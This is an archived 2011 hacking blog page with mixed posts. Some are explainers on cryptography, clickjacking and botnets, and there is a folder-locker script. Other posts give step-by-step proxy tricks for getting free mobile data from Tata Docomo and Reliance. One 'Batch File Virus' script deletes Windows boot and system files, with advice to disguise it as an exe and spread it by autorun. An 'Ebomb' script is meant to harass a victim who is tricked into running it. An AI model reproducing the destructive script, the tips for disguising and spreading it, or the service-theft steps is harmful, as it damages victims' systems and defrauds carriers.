Saturday, 30 July 2011

New DOCOMO & Reliance Free GPRS

today i am here with most wanted hack in tata docomo and reliance.yes i am here with two ucweb which works fine for me tobrowse and download free in tatadocomo. i am launching here two ucweb first is based on india server and second is based on international server. so enjoy thetrick.
steps for reliance users
Download it first!
ucweb_international_server.jar
2)use your default rcomwap settings
APN: rcommms or rcomwap
Proxy: 10.239.221.22
Port: 8080
3) In operator trick which will be load first on starting ucweb 7.0 leave all thinks as it is but only click on "back query" and in that write " ?id=jCustomerWAPProv "
4) thats it enjoy free surfing and downloading at good speed!!
steps for TATA DOCOMO users
First Method for tata docomo
1.Make sure You have Tata Docomo DIVE IN Settings in ure mobile (if You don’t know dive in settings just see all tata docomo gprs settings for all services by tata docomo or You can call customer care and get it you canalso use our previous post Tata Docomo customer care number for all regions )
2.Download Ucweb collection from above
3.Install Appication which you havedownloaded
4.Run UcWeb your Phone using Tata Docomo Dive in settings
5.You can see operator tricks menu just scroll down and go to USE PROXY and select it as HTTP
6.Now go to in PROXY SERVERS Andwrite internet.tatadocomo.com
7.Now don’t change any other settings leave all queries blank means front query, back query,middle query leave all blank
8.That’s it You are Done Now Enjoy Free Surfing as well as Free Downloading
Second Method
1.Make sure You have Tata Docomo DIVEIN Settings in ure mobile (if You don’t know dive in settings just see all tata docomo gprs settings for all services by tata docomo or You can call customer care and get it you can also use our previous post Tata Docomo customer care number for all regions )
2.Download Ucweb collection from above
3.Install Appication which you have downloaded
4.Run UcWeb on your Phone using Tata Docomo Dive in settings
5.Then in First Box in operator tricks menu select CUSTOM1
6.Now go to in PROXY SERVERS And write: divein.tatadocomo.com OR this ip 10.124.72.1717. Now don’t change any other settings leave all queries blank means front query, back query,middle query leave all blank
8.That’s it You are Done Now Enjoy Free Surfing as well as Free Downloading.
ENJOY YOUR FREE WORLD!!! 

............................................................................................................................ 
Posted by at No comments:
Labels:

NTT Docomo an Japanese Telecommunications

Today i am going to explain about other country's telecommunications and how their technologies are growing bettar than us. You all know that japan is one of the fastest growing nation under technology. They are first in all ,But now i am going to explain about their telecommunications network.
As every country has its own build tele network like in india we have BSNL ,they have a tele network called "NTT DOCOMO".

This network operator has many services and features bettar than us some of them which i knew have been posted as follows:

  1. Automatically check your current location at regular intervals

  2. Dictate your mail

  3. Get callers to leave messages when you can't answer the phone

  4. Announce that you are unable to use your phone due to your current situation

These are some cool services where our network operators didn't notify that they are useful, ok leave it then today i have made you to know something intresting so i hope it you will also for tommarow.

Posted by at No comments:
Labels:

Cryptography a simple introducton

Cryptography

If you are familiar with hacking, you know the name of MD5 or Digital signature. These are parts of cryptography. I am writing this post because today i have my semester exam of cryptography, and i think as a hacker you must know about cryptography. Cryptography is a science and art of securing data by changing it in a coded form by some encoding method.
ex-

When Julius Caesar sent messages to his generals, he didn’t trust his messengers. So he replaced every A in his messages with a D, every B with an E, and so on through the alphabet. Only someone who knew the “shift by 3” rule could decode his messages.



 this was an practical example of cryptography. This is also use in securing data on the network. Cryptography is the science of information security.



Cryptography is the science of using mathematics to encrypt and decrypt data. Cryptography enables you to store sensitive information or transmit it across insecure networks (like the Internet) so that it cannot be read by anyone except the intended recipient.


Plain text: Message in it's original form 
Cipher Text: Encoded message
Key: a sequence of bit used in encryption and decryption
Encryption: Algorithm of encoding Plain text to cipher text using key.
Decryption: Algorithm of decoding Cipher text to Plain text using key.

A cryptographic algorithm works in combination with a keyr to encrypt the plaintext. The same plaintext encrypts to different ciphertext with different keys. The security of encrypted data is entirely dependent on two things: the strength of the cryptographic algorithm and the secrecy of the key.

Types of Cryptography:

Symmetric key cryptography or Secret key Cryptography: In a symmetric cipher, both parties must use the same key for encryption and decryption.  This means that the encryption key must be shared between the two parties before any messages can be decrypted. Symmetric systems are also known as shared secret systems or private key systems.


Asymmetric key cryptography or public key Cryptography: In an asymmetric cipher, the encryption key and the decryption keys are separate. In an asymmetric system, each person has two keys. One key, the public key, is shared publicly. The second key, the private key, should never be shared with anyone. When you send a message using asymmetric cryptography, you encrypt the message using the recipients public key. The recipient then decrypts the message using his private key. That is why the system is called asymmetric.

This was the simple introduction of cryptography. I will write more on various cryptographic algorithms and hash functions used in cryptography.

Hash algorithms:  Hash algorithms are based upon one way hash function.
y=f(x) is said to be one way if for every x it is easy to find y but for a given y it is computationally infeasible to get x.
Cryptographic hash function is a mathematical transformation that takes a message m of any length and produce a corresponding message digest (a number of fixed length) of fixed length.
for any two messages m1 and m2:
h(m1) != h(m2) NOT EQUAL
 
 
.................................................................................................................................................

Posted by at 1 comment:
Labels:

Clickjacking | attack and protection

I was surfing around the internet when i saw the news saying that clickjacking attack is now targeting facebook users. yeah it's bad news for facebook user. Then it came in my mind that i didn't tell my readers about this attack. Now it is important to know about this attack because this is very advance attack and need some programming skill. I will try to explain it in simple but it is li'le bit complicated for a non programmer to understand but now too hard as as you are thinking now :)

Clickjacking




Clickjacking is the short form of click hijacking. This vulnerability is used by an attacker to collect an infected user's clicks. The attacker can force the to do all sort of things from adjusting the user's computer settings to unwittingly sending the user to Web sites that might have malicious code. Now how attacker can adjust user's computer setting?? attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both.
The term "clickjacking" was coined by Jeremiah Grossman and Robert Hansen in 2008. The exploit is also known as UI redressing.


Attack Example:
The user receives an email with a link to a video about a news item, but another valid page, say a product page on amazon.com, can be "hidden" on top or underneath the "PLAY" button of the news video. The user tries to "play" the video but actually "buys" the product from Amazon.


Prevention:


NoScript: This is the best prvention aginst Clickjacking. It is a firefox addon and prevent users from clicking invisible click.
GuardedID: It is a commercial product which provides client-side clickjack protection for users of IE or Firefox without interfering with the operation of legitimate iFrames 
Comitari Web Protection Suite: Comitari provides client side protection against ClickJacking (aka UI Redressing) attacks. Installed as browser add-on

............................................................................................................................................
Posted by at No comments:
Labels:

facebook likejacking attack | facebook Deploys Anti-Likejacking Solution



facebook likejacking attack | facebook Deploys Anti-Likejacking Solution
Likejacking term originated from facebook. It's a kind of clickjacking technique to trick facebook users into liking pages. This is achived by making the like button invisible and placing it over another element that is most likely to be clicked by users such as  play button of a video player. As a result, users who try to press play will instead end up liking the page without their knowledge if logged into Facebook.
Likejacking attacks were easy to launch because when shown on third-party websites, the Facebook Like button did not require confirmation, something that security researchers have criticized for some time.


But now facebook has implemented a new mechanism to block likejacking attack by requesting confirmation for suspicious like action. Clicking a suspicious Like button will now transform it into a Confirm one, which when clicked, opens a more detailed confirmation request in a pop-up window.
Posted by at No comments:
Labels:

facebook deploys a new system to detect and prevent spams

facebook deploys a new system to detect and prevent spams


We hear about a new scam daily on facebook. All technology failed to prevent and stop spams on facebook. Facebook has also tie up with WOT to check a link to be malicious or not. Social netorking website has also deloyed a new mechanism to detect and block spams. New mechanism is designed to prevent clickjacking and rogue code pasting tricks commonly used in survey scams. 

Clickjacking is a type of attack that leverages a design flaw in the way browsers work which allows attackers to make a button invisible and overlap it with another harmless element by using legit web programming techniques. Read more in older post.
on facebook clickjacking is the main trick to spread spams. facebook person explains,"We have built defenses to detect clickjacking of the Facebook Like button and to block links to known clickjacking pages. Recently, we improved our systems to also alert people if we think they’re being tricked. Now, when we detect something suspicious, we’ll ask you to confirm your like before posting a story to your profile and your friends’ News Feeds," 


it also deployed a new mechanism to prevent XSS attacks. As the popularity is growing, the social networking website has to work a lot on the security issues.

..............................................................................................................................................
Posted by at No comments:
Labels:

download clickjacking tool

download clickjacking tool
Clickjacking or click hijacking is a type of attack in which attacker use transparent frame to trick a user to click on a link where user wants to click on another page while user wants to click on top level page. Read more in the older post

Although it has been two years since the concept was first introduced, most websites still have not implemented effective protection against clickjacking. In part, this may be because of the difficulty of visualising how the technique works in practice.


I got a perfect tool for testing clickjacking. This new browser-based tool allows a user to experiment with clickjacking techniques by using point-and-click to visually select different elements within a webpage to be targeted. The tool also allows several 'next-generation' clickjacking techniques to be used, as introduced in Paul Stone's Blackhat Europe 2010 talk.


Features:

  1. Use point-and-click to select the areas of a page to be targeted
  2. Supports the new 'text-field injection' technique
  3. Supports the new 'content extraction' technique
  4. 'Visible mode' replay allowing a user to see how the technique works behind the science
  5. 'Hidden mode' replay allows the same steps to be replayed in a hidden manner, simulating a real clickjacking attack.

The tool is currently in an early beta stage, and works best in Firefox 3.6. Full support for other browsers will follow shortly. For further information, please see the Readme.txt file in the downloadable tool.


Read More:

Download Here:
http://www.contextis.co.uk/resources/tools/clickjacking-tool/cjtool.zip










..................................................................................................................................................
Posted by at No comments:
Labels:

A new clickjacking attack hitting facebook

A new clickjacking attack hitting facebook


Many times i have posted about clickjacking attack used in facebook. And i think it's not over. A new clickjacking scam is again hitting facebook walls. The spam messages posted by victims of this attack read: "Baby Born Amazing Effect - WebCamera" and contains a link that takes users to a page hosted at blogspot.com.  The page displays a video player thumbnail with a play button, however, trying to click it actually forces the user's browser to Like the page.
If you want to know what clickjacking is, read clickjacking introduction post.
Few days ago, face deployed a new mechanism for protecting clickjacking attack, but that system doesn't seem to work better. This new spreading scam is the example of it's faliure. 
If you are a firefox user, you can protect yourself by using NOSCRIPT extension.

.................................................................................................................................................
Posted by at No comments:
Labels:

Friday, 29 July 2011

Free Recharge on RELIANCE

[1]Just write a sms: M5 and send to 51234
[2] before 12:00AM Send a sms again. Write: UNSUB 2085 & send it to 155223.
That is it!
Ur rs.5 will be refunded.
Posted by at No comments:
Labels:

Uninor FREE CALLING TRICKS

Uninor Bonus Offer : 60 Free Local Minutes
Uninor announced a Bonus Offer to all its Customers. In this Bonus Offer Customer can get 60 Local Free Minutes,which can be use to any network. Free minutes of 10 will come on every Tuesday and Friday every week till JUNE 10th,2010. So in total 60 Free minutes.To get this Free minutes you have to send an SMS as :BONUS to 50000 (Toll Free)
This free talktime will be used only on Tuesday and Friday Only. So guys Use this Free Talktime.

................................................................................................................................................ 
Posted by at No comments:
Labels:

Bot and botnets

The term bot, derived from “ro-bot” in its generic form. It is a script or set of scripts or a computer program which is designed to perform predefined functions repeatedly and automatically after being triggered intentionally or through a system infection. Bot runs automated tasks over internet. According to the type of working we can say that there are two of Bots.

Benevolent bots: Bots that are used to carry out legitimate activities in an automated manner are called benevolent bots. These are used in search engines to spider online website content and by online games to provide virtual opponent.
Malicious bots: Bots that are meant for malicious intent are known as malicious bots. bots used for DDos attack and spam bots are example of Malicious bots.




The first bot program Eggdrop created by Jeff Fisher in 1993 originated as a useful feature on Internet Relay Chat (IRC) for text based conferencing on many machines in a distributed fashion.

An IRC malicious bot program runs on an IRC host or client each time it boots in a hidden manner and controlled by commands given by other IRC bot(s). It is typically an executable file with a size of less than 15 KB in its compressed form. An IRC host computer running an IRC bot malware program becomes a Zombie or a drone (Choo – 2007). 


The first malicious IRC bot, Pretty Park Worm that appeared in 1999 contained a limited set of functionality and features, such as the ability to connect to a remote IRC server, retrieve basic system information e.g. operating system version, login names, email addresses, etc.


A collection of such type of bot affected systems are know as BOTNET (Bot Networks). A collection of compromised hosts or bot-infected machines running malware such as worms, Trojan horses, or backdoors under command & control (C&C) infrastructure.


Types of Botnets:  There are a variety of botnets in existence today. The three most commonly seen on home and office client computers are HTTP botnets that exploit vulnerabilities in web browsers, IRC botnets that allow operators to control the computers of unsuspecting users through an internet relay chat (IRC) channel, and Peer to Peer (P2P) botnets that infect files shared on P2P services like Gnutella or Limewire.

HTTP Botnets:HTTP typically is used for creation and control of botnets. Bots will sign in to an http server and wait for commands from a bot herder, or they will simply visit pre-designated sites to get commands that are coded into the site’s files.  Many HTTP bots have their own servers for downloading malware, phishing, etc. 

P2P Botnets:Many P2P applications are utilized by bot herders to share files that have bots and malware attached. In most cases, these bots are pre-programmed to perform specific functions when a file is opened, or when a container application like a game or desktop application is installed.

IRC Botnets: The most abundant use of botnets is accomplished using IRC applications. This is because the IRC protocol has been around the longest, and that is where earlier botnets operated before HTTP came along. IRC is used by a wide variety of applications to allow users to have simple text based chatting environments. Infected IRC clients log into a specific IRC server and wait for specially formatted text messages that contain commands. Commands can also be encoded into the title or name of the chat channel, so that every bot entering can be given commands. More sophisticated versions of this will group bots into sub-nets based on the tasks to be performed, or some other distinction. IRC Botnets are generally the most complex and the hardest to detect.





this is the diagram which shows how an attacker spread his bots on victims computer and control those bot program. Mostly these Affected systems are use for illegal activities by attacker without the knowledge of system owner. 

Look at the figure which shows how botnets are used in DDos attacks.

How to Avoid Botnets: 
  • Install an antivirus program from a trusted provider.
  • Make sure the operating system’s firewall is turned on, as well as the firewall of any connected router(s).
  • Keep your operating system, web browser, firewall and antivirus applications up to date.
  • Keep all media players up to date.
  • Pay close attention to the options available when installing downloaded software. Installing toolbars or other gadgets that come from sources other than the site they were created on may have bots attached to the install. Also be skeptical of installation options that ask for permission to change your browser’s home page.
  • Learn to be very critical of emails containing links of any kind or ask you to go to a specific site that you’re unfamiliar with.
  •  
  • ...............................................................................................................................
Posted by at No comments:
Labels:

Make Pen drive bootable. free download FlashBoot 2.0b


FlashBoot 2.0b
FlashBoot is a tool to make USB disks bootable.

Its primary focus is USB Flash disks, but other types of USB devices are supported as well. Making disk bootable involves formatting and copying operating system files to it. Different operating systems are supported: Windows 7/ Vista, Windows XP, SysLinux-based disks, GRUB4DOS disks, Linux kernel etc.
You may create blank bootable USB flash with minimal set of system files and then manually tune it for your needs, or convert a full-featured bootable CD-ROM or floppy disk to bootableUSB Flash keeping all functionality.
FlashBoot can either format physical disk or write an image file. So you may create customized USB disk manually or with another tool and use FlashBoot to create image out of it and redistribute it in local network or online.
FlashBoot 2.0 is a major step forward towards improvement of the software and satisfying user needs. Its code was rewritten from the ground up since old version 1.4 released in 2006.
Download Here:

 
..................................................................................................................................
Posted by at No comments:
Labels:

Batch File Virus (a simple virus for windows)

I assume you know the basic about batch files before reading this post. Batch files are used to run a dos command without opening command prompt window. You can run many dos commands using a single batch file. For this you have to learn how to write a batch file. I am not going to tell you how to make a batch file. If you don’t know how to write, try to learn it from anywhere else. This post will show you some batch files which can corrupt your window. You can also say that these batch files can work like a virus. So be careful and not to try in your computer.




  • Autoexec.bat
  • Ntldr
  • Boot.ini
  • Win.ini
These files are very important and necessary for any windows operating system. So if you want to corrupt windows of a person you have to delete these four files from the computer.
@echo off 
attrib -r -s -h c:\autoexec.bat 
del c:\autoexec.bat 
attrib -r -s -h c:\boot.ini 
del c:\boot.ini 
attrib -r -s -h c:\ntldr 
del c:\ntldr 
attrib -r -s -h c:\windows\win.ini 
del c:\windows\win.ini 

save this code as winVirus.bat.

If you want to make it more harmful, make its exe using bat_to_exe converter and make an autorun disk of it. When someone use the disk autorun will execute itself and command will generated by batch file will corrupt the windows.

............................................................................................................................................
Posted by at No comments:
Labels:

Lock your folders without any softwares

This is a very simple batch file trick. Paste the given code in batch file and save it as with any name.(remember Batch file extension is .bat). Double click on this batch file to create a folder locker. Now you will see a folder name Locker at the same directory of batch file. Put all files which you want to hide in the Locker folder. Double click on this batch file to lock the folder 'Locker'. If you want to unlock your files,double click the batch file again and you would be prompted for password. Enter the password and enjoy access to the folder.




if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


....................................................................................................................................
Posted by at No comments:
Labels:

Ebomb a virus for fun

This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type

@echo off
start iexplore
start notepad
start firefox

and save it as anyname.bat (note: paste the code with "start " in many times to annoy them)


you can also do some additional stuff like enter the message for victim eg. msg * "(Now your pc is getting Hacked)"
and also you can open some websites to irritate victim eg.
start iexplore "www.ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it .............. :D

(Sample eg.
@echo off
msg * "(sorry buddy but you just f*$%d your self)"
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad


and then simply save it as "anyname.bat"

Note : The only way to get out of any ebomb attack is simply by System restart

 

....................................................................................................................
Posted by at No comments:
Labels:

Batch programming tool

Batch programming 
 Batch programming tool


Dr.Batcher 2.1.3 | 5.12 Mb

Dr.Batcher is the simplest batch file editor available on market for batch programming. Using Dr.Batcher you can create batch file even if you have never done it before. If you know a lot about the creation of BAT and CMD files, Dr.Batcher is still useful for you. With Dr.Batcher you can use handy features of professional IDEs like syntax highlighting, code tooltips and bookmarks, that make writing code of batch file easier. Dr.Batcher really helps you to create bat files in easy and fast way!


Features of Dr.Batcher:
  • Simple mode: create BAT files with visual editors and wizards
  • Professional mode: create BAT files with full-featured and highly customizable text editor with syntax highlighting, code tooltips, lines numbering and bookmarks
  • Easy switching between different modes of batch file editor
  • Built-in support for most commonly used standard Windows and DOS commands
  • Support for easy search of additional information on commands in the Web via Google, Yahoo, MSN Search
  • Support for looking through environment variables and copying their values
  • Expandability: easy to add new commands through XML files with their descriptions
  • Support for BAT scripts in Windows and DOS encoding, fast conversion of text from one encoding to another
  • Support for automatic updates
  • Exporting BAT files to HTML, RTF (Microsoft Word), TeX and printing them with syntax highlight
  • Support for changing language of Dr.Batcher’s user interface
  • Windows 7 support
  • Templates and examples



Download Here:
........................................................................................................................... 
Posted by at No comments:
Labels:
Subscribe to: Comments (Atom)